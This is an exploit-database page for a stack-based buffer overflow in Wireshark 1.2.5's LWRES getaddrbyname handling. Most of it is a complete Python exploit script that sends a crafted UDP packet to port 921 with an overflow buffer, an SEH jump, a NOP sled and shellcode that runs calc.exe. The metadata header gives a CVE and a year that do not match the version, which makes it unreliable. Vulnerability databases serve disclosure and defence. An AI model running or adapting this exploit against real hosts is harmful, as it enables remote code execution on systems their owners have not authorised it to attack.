header-logo
Suggest Exploit
vendor:
Wireshark
by:
babi, Nullthreat & Pure|Hate
9,3
CVSS
HIGH
Stack-based buffer overflow
120
CWE
Product Name: Wireshark
Affected Version From: 1.2.5
Affected Version To: 1.2.5
Patch Exists: YES
Related CWE: CVE-2008-1563
CPE: a:wireshark:wireshark:1.2.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0890/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-1563/https://www.rapid7.com/db/vulnerabilities/wireshark-cve-2008-1563/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-1563/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-1563/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2008

Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow

A stack-based buffer overflow vulnerability exists in Wireshark 1.2.5 due to improper bounds checking of the LWRES getaddrbyname request. An attacker can send a specially crafted LWRES getaddrbyname request to trigger a stack-based buffer overflow, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Wireshark.
Source

Exploit-DB raw data:

#!/usr/bin/env python
# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow
# Discovered by babi
# Reference: http://www.exploit-db.com/exploits/11288
# Exploit Dev by Nullthreat & Pure|Hate

import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  exit(2)

port = 921
addr = (host, port)

leng = 9150
high = int(leng / 256)
low = leng & 255

crash = ("A" * 2128)

# Short jump
jmp = "\x90\x90\x06\xeb"

# pop/pop/ret in pcre3 0x61b4121b
ppr = "\x1b\x12\xb4\x61"

nop  = ("\x90" * 24)

# 224 bytes = calc.exe
shellcode = (
"\xbf\x86\x0a\x33\xa0\x2b\xc9\xda\xd9\xd9\x74\x24\xf4\xb1"
"\x32\x5e\x31\x7e\x11\x03\x7e\x11\x83\xc6\x82\xe8\xc6\x5c"
"\x62\x65\x28\x9d\x72\x16\xa0\x78\x43\x04\xd6\x09\xf1\x98"
"\x9c\x5c\xf9\x53\xf0\x74\x8a\x16\xdd\x7b\x3b\x9c\x3b\xb5"
"\xbc\x10\x84\x19\x7e\x32\x78\x60\x52\x94\x41\xab\xa7\xd5"
"\x86\xd6\x47\x87\x5f\x9c\xf5\x38\xeb\xe0\xc5\x39\x3b\x6f"
"\x75\x42\x3e\xb0\x01\xf8\x41\xe1\xb9\x77\x09\x19\xb2\xd0"
"\xaa\x18\x17\x03\x96\x53\x1c\xf0\x6c\x62\xf4\xc8\x8d\x54"
"\x38\x86\xb3\x58\xb5\xd6\xf4\x5f\x25\xad\x0e\x9c\xd8\xb6"
"\xd4\xde\x06\x32\xc9\x79\xcd\xe4\x29\x7b\x02\x72\xb9\x77"
"\xef\xf0\xe5\x9b\xee\xd5\x9d\xa0\x7b\xd8\x71\x21\x3f\xff"
"\x55\x69\xe4\x9e\xcc\xd7\x4b\x9e\x0f\xbf\x34\x3a\x5b\x52"
"\x21\x3c\x06\x39\xb4\xcc\x3c\x04\xb6\xce\x3e\x27\xde\xff"
"\xb5\xa8\x99\xff\x1f\x8d\x55\x4a\x3d\xa4\xfd\x13\xd7\xf4"
"\x60\xa4\x0d\x3a\x9c\x27\xa4\xc3\x5b\x37\xcd\xc6\x20\xff"
"\x3d\xbb\x39\x6a\x42\x68\x3a\xbf\x21\xef\xa8\x23\xa6\xe5"
)

crash2 = ("\xcc" * 6752)

data  = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x00\x00\x01"
data += chr(high) + chr(low) + crash + jmp + ppr + nop  + shellcode + crash2 + "\x00\x00"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  exit(1)

udps.close()
exit(0)

Navigation

Suggest Exploit

Services By CQR